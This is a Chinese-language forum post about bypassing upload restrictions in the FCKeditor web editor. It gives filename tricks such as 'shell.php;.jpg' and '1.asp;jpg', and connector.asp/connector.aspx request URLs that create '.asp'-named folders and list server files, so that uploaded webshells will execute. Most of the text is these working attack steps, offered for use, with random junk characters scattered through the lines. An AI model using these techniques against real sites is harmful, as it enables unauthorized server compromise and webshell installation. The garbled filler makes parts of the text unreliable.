很多时候上传的文件例如:shell.php.rar 或 shell.php;.jpg 会变为 shell_php;.jpg 这是新版 FCK 的变化,试试上传 1.asp;jpg$ a" J) }7 {5 h8 M
& o5 n) }( y) J6 V% H, z4 Y
提交 shell.php+空格 绕过,不过空格只支持 win 系统 *nix 是不支持的,shell.php 和 shell.php+空格 是 2 个不同的文件,未测试。
O; p$ z$ a) S0 k! m
( `- ?9 e" p7 f' l% a继续上传同名文件可变为 shell.php;(1).jpg,也可以新建一个文件夹,只检测了第一级的目录,如果跳到二级目录就不受限制。. u W* h( m* G _
0 ~* x2 Y4 r; l6 S7 }突破建立文件夹:
5 W2 `% ?6 C# g3 I
2 L. X! g$ L- i* o+ _1 veditor/FCKeditor/editor/filemanager/connectors/asp/connector.asp?Command=CreateFolder&Type=Image&CurrentFolder=/qing.asp&NewFolderName=x.asp
1 |( g% H. N% J: C" p
1 ?) m1 T! s, u参数:' B- U2 |* X7 [+ j3 |; `/ X; K8 i q
! \1 w. G8 H$ X6 L! A3 p/ Y2 d; ~
当前目录名:CurrentFolder=/qing.asp
1 C) m) K) H/ w" [! Y& d: w. L9 d- h* O2 y8 G! U
新的目录名:NewFolderName=x.asp, Z9 }, m l1 s( L# C
: I! C$ e% H( J# G) w( y其实很简单,在目录那里写 x.asp,然后点击新建目录在弹出来的对话框中随便写……8 {0 V: K7 Y4 Q; S
# m, _0 {7 i% n. y那么 x.asp 就已经建立生成了,此方法百试百灵!8 k+ V' P: k9 l% w6 A; X& n
9 B! y5 I+ U5 w9 b) Y3 I新建文件夹参数 x.asp,基本都能搞定。
& I9 f8 ^; s N# A8 e2 H g. U1 i+ R+ K [
下面这句话是要在1.asp下建立2.asp,当不存在1.asp时会先创建,只过滤了目标目录的创建 而没有过滤不存在目录的创建
/ [0 k. ?( W2 m2 ^+ p
) o; Z ]; ^8 s1 A7 j% \+ f7 R; ^aspx/connector.aspx?Command=CreateFolder&Type=File&CurrentFolder=%2F1.asp&NewFolderName=2.asp& Q8 c% y0 o U; Z# R& I9 V
. {8 b8 k! s- F6 ?" j
获取文件列表$ \2 L+ K$ M" X% W8 z! F t+ ^
aspx/connector.aspx?Command=GetFoldersAndFiles&Type=File&CurrentFolder=%2F
% \2 A# I! ~6 G: p- k8 ^! K ?1 L( U: |
|
发表于 2012-12-31 09:27:09
收藏
支持
反对